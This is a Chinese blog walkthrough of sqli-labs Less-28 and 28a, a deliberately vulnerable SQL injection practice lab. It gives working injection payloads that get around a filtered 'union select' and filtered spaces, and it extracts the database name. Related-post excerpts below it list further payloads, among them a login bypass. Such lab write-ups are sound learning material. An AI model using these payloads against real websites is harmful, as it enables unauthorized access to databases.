sqllab第二十八关通关笔记(附带28a)

已于 2024-03-17 16:00:46 修改
阅读量299 收藏 2
点赞数 6
文章标签: 笔记 sqllab
于 2024-03-17 15:41:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_WORM/article/details/136782901
版权

知识点:

  • union select 整体过滤
    • union all select 替换
  • where id=('输入')
  • 空格 + 过滤了,使用%09代替

经过不断的测试,发现原始语句为 where id=('输入')

构造payload:id=1')and%091=('1

成功回显出了相关的信息

好,尝试进行错误注入

构造payload:id=1')and%09exp(710)=('1

发现没有任何的回显信息,说明这里不能用错误注入

尝试进行联合注入

构造payload:id=0%27)UNion%09SElect%091,2,3%09and1=(%271

发现利用大小写不能够绕过

经过测试发现它是过滤union select整个字段,好好好,那么利用union all select绕过

构造payload:id=-1%27)union%09all%09select%091,2,3%09and1=(%271

页面成功回显了,但是内容不是输入信息,应该是他把-1进行绝对值处理了,导致显示了id=1的内容

重新构造payload:id=0%27)union%09all%09select%091,2,3%09and1=(%271

页面成功回显了输入内容,发现有两处输出点,猜测是前两位,但是测试发现只有用户名处是输出信息,密码不受影响

获取数据库名

构造payload:id=0%27)union%09all%09select%091,database(),3%09and1=(%271

成功获取到了数据库名,之后的信息也一样

附带28a

28a关和28关的区别在于这关只对union select进行了过滤

同样可以用28关的payload进行处理,具体就不实操了,参考上面的方法就行了

10

I_WORM
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQL-lab-23~28
qq_52921637的博客
03-22 180
less23 由题目可以知道,本是过滤注释的GET型注入: 注入的语句是:id=-1’ union select 1,2,3 ='1 less24 本是——二次注入 知道用户名是:admin,但是不知道密码首先点击New User click here? 注册admin’ – -用户然后登录该用户修改密码 会显示,密码修改成功:然后再使用admin输入刚才admin’ – -修改的密码最后,登录成功,此时两个账号的密码一样 less25 本卡,过滤or和and的单引号注入 注入语句是:id=-1’ u
KYN28A-12安装使用说明书.doc
最新发布
07-01
### KYN28A-12铠装移开式金属封闭开设备安装使用与维护手册知识点解析 #### 一、总则 ##### 1.1 概述 **KYN28A-12**是一种铠装移开式金属封闭开设备,主要用于三相交流50Hz、7.2~12kV的单母线及其分段电力系统...
sqli-labs(28-28a)
qq_43579362的博客
02-15 1432
Less-28 1.测试http://127.0.0.1/sqli-labs/Less-28/?id=1%27,页面回显不正常,但又没有错误提示,报错注入没戏,尝试闭合语句,加单引号回显不正常,说明sql语句闭合至少有',可能有),判断有无)在Less-26已经写过,经过验证确实含有'。 2.尝试使用联合查询注入,构造语句http://127.0.0.1/sqli-labs/Less-28/?id...
Sqli-labs之Less-28和Less-28a
m0_46315342的博客
06-04 643
                                          &nbs...
Sqli-labs less 28
weixin_34405354的博客
08-11 115
Less-28 本考察内容与27没有太大的差距,我们直接给出一个payload: http://127.0.0.1/sqllib/Less-28/?id=100')union%a0select(1),(user()),(3)||('1 转载于:https://www.cnblogs.com/lcamry/p/5762973.html...
sqli-labs/Less-28
m0_71299382的博客
11-20 339
sqli-labs第二十八a
打印机驱动 惠普28A 31W驱动
05-29
打印机驱动 惠普28A 31W驱动打印机驱动 惠普28A 31W驱动打印机驱动 惠普28A 31W驱动打印机驱动 惠普28A 31W驱动打印机驱动 惠普28A 31W驱动打印机驱动 惠普28A 31W驱动打印机驱动 惠普28A 31W驱动打印机驱动 惠普28A...
sketch_mar28a.zip_Sketch!_arduino_sketch_mar28a
07-15
_arduino_sketch_mar28a"这个文件名揭示了一个特定的Arduino Sketch项目,名为"sketch_mar28a",它在2023年3月28日进行了更新。这个Sketch项目专注于LED显示,并且提供了三种不同的工作模式:呼吸灯效果、光敏电阻...
vue-xue_javascript_xuevue_join28a_vue_
09-30
"vue-xue_javascript_xuevue_join28a_vue_"这个标题可能是某次于Vue.js学习或培训的资料集合,主要注Vue的双向数据绑定、计算属性以及生命周期等方面。下面我们将深入探讨这些知识点。 首先,我们来看双向数据...
于开柜KYN28A-12电路结构分析
11-08
KYN28A-12开柜是一种专为三相交流50Hz设计的户内成套配电设备,主要用于3.6-12千伏电力网络的电能接收、分配、控制和保护。这款开柜遵循GB3906、DL404、IEC-298等国际和国内标准,特别强调了"五防"安全功能,以...
[靶场] SQLi-Labs Less28-Less36
3hex的博客
09-26 197
提供主要的语句,略去探测数据库名,表名,字段名的步骤。 31.Less28 请求方式 注入方式 类型 备注 GET 基于报错注入(Union内联注入) 字符型 过滤键词select、union以及组合,单引号、括号闭合 1. 正常提交 http://127.0.0.1:8003/Less-28/?id=1 2. 语句报错 http://127.0.0.1:8003/Less-28/?id=1 1'2"3 http://127.0.0.1:8003.
【sql-labs】闯记录28~38详解
qq_43665434的博客
04-24 577
【sql-labs】闯记录28~38 【less-28】过滤union%0aselect 测试流程 ?id=1') and%0a'1'=('1 #成功回显 ?id=1') and%0a'1'=('2 #会显失败 #测试回显字段 ?id=232323') %0aunion%0aselect%0a1,2,3%0aand%0a'1'=('1 #发现union%0aselect被过滤了 #于是混淆双写,成功绕过 ?id=232323') %0auniunion%0aselecton%0aselect
sqli-labs (less25-less28a)
Xi4or0uji
08-04 417
这里开始就是各种花式绕waf了,肉鸡打算把它们放在一篇,所以可能会很长 less 25 or && and 至于怎么绕? 大小写:Or、oR 重复:oorr、anandd 符号:&&、|| 各种编码:0x.....、unicode 然后..........没有然后了(想不到了 剩下的payload顺便给一给 ?id=1' oorr extract...
SQL-labs的第28——union和select被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-04 333
的空格、-和注释也别屏蔽了。这里是屏蔽union select这个组合而不是单个的union或select。并且该不返回错误,所以不使用?id=1\,而且也不使用报错注入。
(手工)【sqli-labs28、28a】字符型注入、盲注、过滤
07-14 1071
【SQL-字符型注入、盲注、过滤】
sql-labs闯26~31
qq_44663230的博客
09-03 2364
sql-labs闯26-28a 29~31暂时不做
sqli-labs(28)---原创原创自此一家
weixin_30437847的博客
05-29 672
0X01构造闭合 ’报错 )报错 其他不报错 那我们猜想是不是')的闭合 ?id=1')||('1')=('1 返回正确 那么好像猜对了 0X02爆表名 过滤了相连接的union和select ?id=')%0AUNIOn%0ASELECt%0A1,database(),3and%0A('1')=('1 这里过滤了相连接的union select 那咋办呐? ...
sqli-labs————Less-28
Fly_鹏程万里
05-16 1076
Less 28这一于之前的27没有什么差别,这里直接给出一个payload,用户可以自己思考自我测试,如果有不清楚的可以查看之前的第27的详细介绍。payload:http://192.168.11.136/sqli-labs/Less-28?id=1')union%a0select(1),(user()),(3)||('1...
sqli-labs通关28
03-05
sqli-labs是一个用于学习和练习SQL入的实验平台。通关28其中的一个卡,下面是于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到登录请求的参数,例如:`http://localhost/sqli-labs/Less-28/?id=1&Submit=Submit#`。 4. 在URL中的`id`参数处存在SQL注入漏洞,我们可以尝试利用这个漏洞进行攻击。 5. 输入`' or '1'='1`作为`id`参数的值,然后点击提交按钮。 6. 如果成功利用了SQL注入漏洞,你将会被认为是管理员身份登录成功,并且可以看到管理员的相信息。 请注意,sqli-labs是一个用于学习和练习SQL注入的平台,仅供合法目的使用。在实际应用中,SQL注入是一种严重的安全漏洞,需要谨慎对待。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值